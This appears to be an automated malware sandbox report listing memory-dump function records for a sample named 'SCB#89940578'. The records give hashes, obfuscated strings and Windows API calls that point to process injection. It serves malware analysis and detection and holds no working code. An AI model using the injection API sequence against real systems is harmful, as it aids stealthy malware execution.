                                              • Opcode ID: f0bda76dfe74ac5e2f0b545b3c774031b6779524825e55cc5dee9b5e0a1a747e
                                              • Instruction ID: 19cb1ef84168cf0bd0016551ee0a5633f1107491de2aba34c54139b8a1e59828
                                              • Opcode Fuzzy Hash: f0bda76dfe74ac5e2f0b545b3c774031b6779524825e55cc5dee9b5e0a1a747e
                                              • Instruction Fuzzy Hash: A22127B1900359DFDB10DFAAC885BDEBBF5FF48310F108429E958A7250C7789944CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1776 737eeb0-737ef03 1779 737ef05-737ef11 1776->1779 1780 737ef13-737ef16 1776->1780 1779->1780 1781 737ef1d-737ef43 Wow64SetThreadContext 1780->1781 1782 737ef45-737ef4b 1781->1782 1783 737ef4c-737ef7c 1781->1783 1782->1783
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0737EF36
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 2249d9bd915c6ba86e0bdfa44c0f36f87a8728972080d8c64855691dbbf49f8c
                                              • Instruction ID: 593cb092fa8b9d9646260634c0b6b460418c308b46383207cb900625fdcf223d
                                              • Opcode Fuzzy Hash: 2249d9bd915c6ba86e0bdfa44c0f36f87a8728972080d8c64855691dbbf49f8c
                                              • Instruction Fuzzy Hash: 6F2159B19002099FDB20DFAAC4857EEBBF4EF48320F54842AD458A7241C7789544CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1787 737f9a8-737fa3d ReadProcessMemory 1791 737fa46-737fa76 1787->1791 1792 737fa3f-737fa45 1787->1792 1792->1791
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0737FA30
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 4f4b96a5119de9badc04f26362c11e0441ca62c0cb75a6112a6bbb7c35a2b247
                                              • Instruction ID: 72cb898eb7fb634b327820f985b7f9dc4a1605d2649bd3d40082b20c29bc6cd5
                                              • Opcode Fuzzy Hash: 4f4b96a5119de9badc04f26362c11e0441ca62c0cb75a6112a6bbb7c35a2b247
                                              • Instruction Fuzzy Hash: F92136B18002599FDB10DFAAC881AEEFBF5FF48320F10842AE558A7250D7389945CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0298D586,?,?,?,?,?), ref: 0298D647
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1705635851.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2980000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 7e0fb5dc8e1176cee472a6de57fa84c3ee6005f46b7923f8cde2930596d171bd
                                              • Instruction ID: 5a65a47942483f6065f627f1115ab765c927fcb67a97cc4dd3f1664614403063
                                              • Opcode Fuzzy Hash: 7e0fb5dc8e1176cee472a6de57fa84c3ee6005f46b7923f8cde2930596d171bd
                                              • Instruction Fuzzy Hash: CB21E4B5901208EFDB10DFAAD584ADEBBF8FB48324F14841AE958A7350D374A940CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0737EF36
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: cde84628098a8893a49fee21d912429fba8aa76636d807afbbbad415011fb6ea
                                              • Instruction ID: 5228710f8f1f39014d53ab8ee6955d602947bbe82f64542b9b6c28e296d50b8b
                                              • Opcode Fuzzy Hash: cde84628098a8893a49fee21d912429fba8aa76636d807afbbbad415011fb6ea
                                              • Instruction Fuzzy Hash: 5F2149B1D003098FDB10DFAAC4857EEBBF4EF88324F548429D459A7240C7789944CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0737FA30
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 4486977cd1bd24c8f120ef70d1928307eff2856694755186edbc11aa4668445c
                                              • Instruction ID: 5856daf899c50fbd2df78082f87c63dee1eeaf47a0e5c3c0c6809b2877ed0225
                                              • Opcode Fuzzy Hash: 4486977cd1bd24c8f120ef70d1928307eff2856694755186edbc11aa4668445c
                                              • Instruction Fuzzy Hash: AF2128B18002599FDB10DFAAC880AEEFBF5FF48320F108429E558A7250C7389545CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0298AFB9,00000800,00000000,00000000), ref: 0298B1CA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1705635851.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2980000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: f3b9606bfcc803d0590163c57d55729c3e5327fe5da1d9f1c230e80db3e5a4c5
                                              • Instruction ID: 8360d57849c1fee716df45f8c43fc3765da6b003e639a44b39c49b50a89efa88
                                              • Opcode Fuzzy Hash: f3b9606bfcc803d0590163c57d55729c3e5327fe5da1d9f1c230e80db3e5a4c5
                                              • Instruction Fuzzy Hash: B51126B69003099FDB10DF9AC944BEEFBF4EB88314F14842AE459AB210C375A544CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0737F86E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 0d866ba89294cde24f6650338b81573ef87cc533b2fe0e096fca58924e351c2b
                                              • Instruction ID: 587f7573a51c1fd44e6c9c55292c6ac4540fc6af5fb6aeb8004fb6d19de57a57
                                              • Opcode Fuzzy Hash: 0d866ba89294cde24f6650338b81573ef87cc533b2fe0e096fca58924e351c2b
                                              • Instruction Fuzzy Hash: 651159B69002499FDB20DFAAC844BDEBFF5EF88324F148819E599A7250C735A544CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0737F86E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 148002e5854ce021083cf3fe0a6dac06d57a627cd91aff1cecb262226a446779
                                              • Instruction ID: 914c7bfac8f161dc4f3c148ab1fe6826a8ffc2fda0af6607c949744dcc2743c1
                                              • Opcode Fuzzy Hash: 148002e5854ce021083cf3fe0a6dac06d57a627cd91aff1cecb262226a446779
                                              • Instruction Fuzzy Hash: 931137B29002499FDB20DFAAC844BDEBFF5FF88324F148819E559A7250C775A944CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: dcc10adf4a7019a3da46945e19c48656acb59e443e2bbc29e2916d19298f8fef
                                              • Instruction ID: 33bb8a5aee9ae4325b9a5eeaeae06c9536320158883361e877f15757263e78ef
                                              • Opcode Fuzzy Hash: dcc10adf4a7019a3da46945e19c48656acb59e443e2bbc29e2916d19298f8fef
                                              • Instruction Fuzzy Hash: BD1158B19002498FDB24DFAAC5457DEFBF4EB88324F248819D459A7240C739A944CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: a364b026abcbf45f753eff2d89f025c286cf2e4fcad56bb1af9485dd78c03ee9
                                              • Instruction ID: 5a8c79fc8ca92deef8eb2453494725d84d020d3786d7e553828be7434c475a6f
                                              • Opcode Fuzzy Hash: a364b026abcbf45f753eff2d89f025c286cf2e4fcad56bb1af9485dd78c03ee9
                                              • Instruction Fuzzy Hash: 891136B19002498FDB20DFAAC4457DEFBF5EB88324F208829D459A7250CB79A944CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0298AF3E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1705635851.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2980000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 16c68b192cc0ff4ad5967b5a93ba24d2148c33d5a5f2a9e2e1405cf9f0a480eb
                                              • Instruction ID: cc2011e1724c20f905c5095fbe3b1511ba79223a21c73582ec99796a51f58af5
                                              • Opcode Fuzzy Hash: 16c68b192cc0ff4ad5967b5a93ba24d2148c33d5a5f2a9e2e1405cf9f0a480eb
                                              • Instruction Fuzzy Hash: 3B1110B6C003498FDB10DF9AC544ADEFBF8AF88324F14846AD468A7210C379A545CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1705079647.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d8d000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4c9884737ad0e3a2105ac5a26bf1be59d76122611413fb66b47d9465e942a0bf
                                              • Instruction ID: 18a3f739832075ff6b47e77a0a77688fb507144c5e534bb3e0780cec2b9cd1bb
                                              • Opcode Fuzzy Hash: 4c9884737ad0e3a2105ac5a26bf1be59d76122611413fb66b47d9465e942a0bf
                                              • Instruction Fuzzy Hash: 7421F171504204EFCB05EF14D9C4B2ABF66FB88310F24C669E9494A2D6C336D816CBB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1705079647.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d8d000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f40f9de9020557db0fdba84450a55f19ecd0afe079828cff489f2dc24d5cfa60
                                              • Instruction ID: e1abffe5b6ae440c54162c958e89b58b7f7539a6ffa11bc8ff5ec7f7eb5db8a2
                                              • Opcode Fuzzy Hash: f40f9de9020557db0fdba84450a55f19ecd0afe079828cff489f2dc24d5cfa60
                                              • Instruction Fuzzy Hash: B6212871500204DFDB05EF18D9C0B26BF66FB94324F24C169D9094B2D6C336E856C7B1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1705125434.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d9d000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6178c6b9decd89b822afd1e48aed5beaf650755b4cb20b8d28a3cc37a8f99482
                                              • Instruction ID: 4c88d48df9d49e3499ccab148cd16c5857a294fa060f2b72bfcf792743243e90
                                              • Opcode Fuzzy Hash: 6178c6b9decd89b822afd1e48aed5beaf650755b4cb20b8d28a3cc37a8f99482
                                              • Instruction Fuzzy Hash: CA21FF71604200DFDF14DF24D984B26BBA6FB88314F24C669E84E4B296C33AD847CA71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1705125434.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d9d000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f2f9859fc5aaaf07be3e73b243aee3e65564a3c7bf0201216c5ab4d5aa655a7d
                                              • Instruction ID: 560d0c1eb95f5d4edc41dc7daf7e25bbf5bbac3a745e1e9b37cfddcd67458da1
                                              • Opcode Fuzzy Hash: f2f9859fc5aaaf07be3e73b243aee3e65564a3c7bf0201216c5ab4d5aa655a7d
                                              • Instruction Fuzzy Hash: 06210471504200EFDF05DF14DAC0B2ABBA6FB84314F24C66DE9494B296C336D846CA75
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1705125434.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d9d000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 60eea47fd86717dc985f13cac6388d71597a140dcbf15b7a5b6af607c32ee616
                                              • Instruction ID: b48549c2ddacd86f72be73a2706353f6a4c860a14c53b01b1e07b2b5e9d24ef9
                                              • Opcode Fuzzy Hash: 60eea47fd86717dc985f13cac6388d71597a140dcbf15b7a5b6af607c32ee616
                                              • Instruction Fuzzy Hash: DC215E755093808FDB16CF24D994715BF72EB46314F28C5EAD8498F6A7C33A980ACB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1705079647.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d8d000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                              • Instruction ID: eb2313b4d51cf731243ccc57746ba8666713d9306363abdad9fa4d19d49b9100
                                              • Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                              • Instruction Fuzzy Hash: 5221E176404244DFCB06DF00D9C4B16BF72FB84314F28C2A9DC084B296C33AD82ACBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1705079647.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d8d000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                              • Instruction ID: 9c6cc4a5cc4e047525d37f4c28b8d773c46abf5c3abbf1e23a1500b95479de56
                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                              • Instruction Fuzzy Hash: 92112672404240DFCB02DF04D5C4B16BF72FB94324F28C2A9DC090B296C33AE85ACBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1705125434.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d9d000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                              • Instruction ID: b97cb94ab9312380e2a6ed81380da5a595f1121ad4d0e70096b292b1de9a3e1c
                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                              • Instruction Fuzzy Hash: 90118B75504280DFDB16CF14D5C4B15BBA2FB94314F28C6AAD8494B696C33AD84ACB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1705079647.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d8d000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 70e2df81222f0157852649bdf8d3dafe9a28de85313b08daf331cfd3490fa47b
                                              • Instruction ID: 65fd0aefdead453157a90d5297690caa08ee6c16a2326b70cfde26faba582edf
                                              • Opcode Fuzzy Hash: 70e2df81222f0157852649bdf8d3dafe9a28de85313b08daf331cfd3490fa47b
                                              • Instruction Fuzzy Hash: 7D012B710093409AE7106E26CDC4B67BF9DEF41364F1CC92AED4A0A2C6C279DC41CB71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1705079647.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d8d000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ecb44b9daf348bb8f6cb2ed924e1ca8795d225101a6426cf095fe724680ce577
                                              • Instruction ID: ce62538e44242a39dae3f22137a81682c224dc5a9695006bb19e54b57049938b
                                              • Opcode Fuzzy Hash: ecb44b9daf348bb8f6cb2ed924e1ca8795d225101a6426cf095fe724680ce577
                                              • Instruction Fuzzy Hash: 1DF0C2710053409AE7109E16CCC8B62FFA8EB51334F18C45AED090A2C6C2799C40CBB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: T+-q$[V~*$[V~*$]\`
                                              • API String ID: 0-1849991408
                                              • Opcode ID: 8b5cdc25ab10f4a2bca496324a93cf85ff900811b1e43a5251778fd8799a442c
                                              • Instruction ID: 0b31071014f5be6ac65331983567fb11d86cf411a1c42bf03c97b4c1a73f6795
                                              • Opcode Fuzzy Hash: 8b5cdc25ab10f4a2bca496324a93cf85ff900811b1e43a5251778fd8799a442c
                                              • Instruction Fuzzy Hash: 1AB135B0E19619DBDB08CFAAD99189EFBF2BF89300F14D52AD419BB214D3349902CF55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: T+-q$[V~*$]\`
                                              • API String ID: 0-3978741314
                                              • Opcode ID: f8994f80b9fa806c1f26abc40b781c2feb84d6eefbe42ed71046c4b12895c5d6
                                              • Instruction ID: 4712452a2f03c496a54a2b54f1abcfb578f1d7039415c5b10f8409cd08059472
                                              • Opcode Fuzzy Hash: f8994f80b9fa806c1f26abc40b781c2feb84d6eefbe42ed71046c4b12895c5d6
                                              • Instruction Fuzzy Hash: 4FB144B0E19619DBDB08CFAAD99189EFBF2BF89300F14D52AD419BB214D3349902CF55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Kk$Z;ya
                                              • API String ID: 0-687208382
                                              • Opcode ID: 621e3fb69221b4f17b1ef92cff2ff4fddb11c3bd6e7de2f906fd29b214b7fbee
                                              • Instruction ID: 3e99ff9ae35bec893e76f259e6dba96958bae8dd80b5dce46b7ba7c57bb8fe3c
                                              • Opcode Fuzzy Hash: 621e3fb69221b4f17b1ef92cff2ff4fddb11c3bd6e7de2f906fd29b214b7fbee
                                              • Instruction Fuzzy Hash: FD519FB4D16249DFDB09CFA9C48049EFBB2EF4A310F14D4AAC409AB212D7389A81CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1707555025.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4f30000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: df93f9da7c0832233cc6450c6a0744a3f4f45f1f7b0dfa68bf426883b6ac58fb
                                              • Instruction ID: 93aed39a00fe0996c4312ab843ac962cc63f76118bd2961633c94f2fb9af01d9
                                              • Opcode Fuzzy Hash: df93f9da7c0832233cc6450c6a0744a3f4f45f1f7b0dfa68bf426883b6ac58fb
                                              • Instruction Fuzzy Hash: 3212B8B2C82B458BE390CFA5E94C1897BB1BB41318BD14A09D3625B2E5DFBC9167CF44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e903da622579cee274b63d7c37031b855345f38103f1962130fedc5d24cb4756
                                              • Instruction ID: 5e7e58136e9d849ade95238bb72b18b2d48b01999f4821c2f74da2cdd9947c2e
                                              • Opcode Fuzzy Hash: e903da622579cee274b63d7c37031b855345f38103f1962130fedc5d24cb4756
                                              • Instruction Fuzzy Hash: BBE11EB4E1021A8FDB14DFA9C5809AEFBF2FF49314F248159E419AB355DB34A942CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 43fc852b93c9357ca1965e8c62ae857b561ffc2217269fbcca5f3abebe5a39ca
                                              • Instruction ID: 57e593e98b09c217b02ee628892d3d8c7e9a4e0cf206aaa373c28a7cc0dc7ac9
                                              • Opcode Fuzzy Hash: 43fc852b93c9357ca1965e8c62ae857b561ffc2217269fbcca5f3abebe5a39ca
                                              • Instruction Fuzzy Hash: 61E10BB4E102198FDB14DFA9C5809AEFBF2BF89304F248169D419AB356DB35A941CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 37261e77049e97f79c2009e744ce74e8de7ac4c7aff7266ee3cbba1920ba4de3
                                              • Instruction ID: 886c23a9521dbade4987977e0e87662e997db819d4f39d75d289ddb94a32c58b
                                              • Opcode Fuzzy Hash: 37261e77049e97f79c2009e744ce74e8de7ac4c7aff7266ee3cbba1920ba4de3
                                              • Instruction Fuzzy Hash: 0AE11DB4E0021A8FDB14DFA9C5809AEFBB2FF89304F248159D419AB355DB35A942CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4437d28519a915b23f9ae0f87dfe99e528d0417190d227f2d9ac0a27936cb18e
                                              • Instruction ID: e0890bb94b66d62eb8df5b290b0b0f5a8ffb496f74646a6641b26d50220558e9
                                              • Opcode Fuzzy Hash: 4437d28519a915b23f9ae0f87dfe99e528d0417190d227f2d9ac0a27936cb18e
                                              • Instruction Fuzzy Hash: E2E13EB4E102198FDB14DFA9C5809AEFBF2FF89304F249159D419AB315DB34A942CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f2d1165685c3ba9f4de7b51b58929a5e60b9393620956b53f36d819c6d9057a7
                                              • Instruction ID: a6608a7ae7a1f33a0a47f217e05dd62945ea440defc3da18728fae9737b5c30a
                                              • Opcode Fuzzy Hash: f2d1165685c3ba9f4de7b51b58929a5e60b9393620956b53f36d819c6d9057a7
                                              • Instruction Fuzzy Hash: 7EE11DB4E002198FDB14DFA9C5809AEFBB6FF89304F249159E419AB356DB34AD41CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1705635851.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2980000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 015a3dd0af4f06cdd350c1b9ade67ecad9d01c8d5d5b57464641885da4ad0485
                                              • Instruction ID: d1384f2217b0de4f1017b593d41aaa65ea2609f468f44061ab843650a09f73fc
                                              • Opcode Fuzzy Hash: 015a3dd0af4f06cdd350c1b9ade67ecad9d01c8d5d5b57464641885da4ad0485
                                              • Instruction Fuzzy Hash: 8CA17F32E002198FCF05EFB4C85059EBBB6FF85304B19457AE905AB265DB35E916CF40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
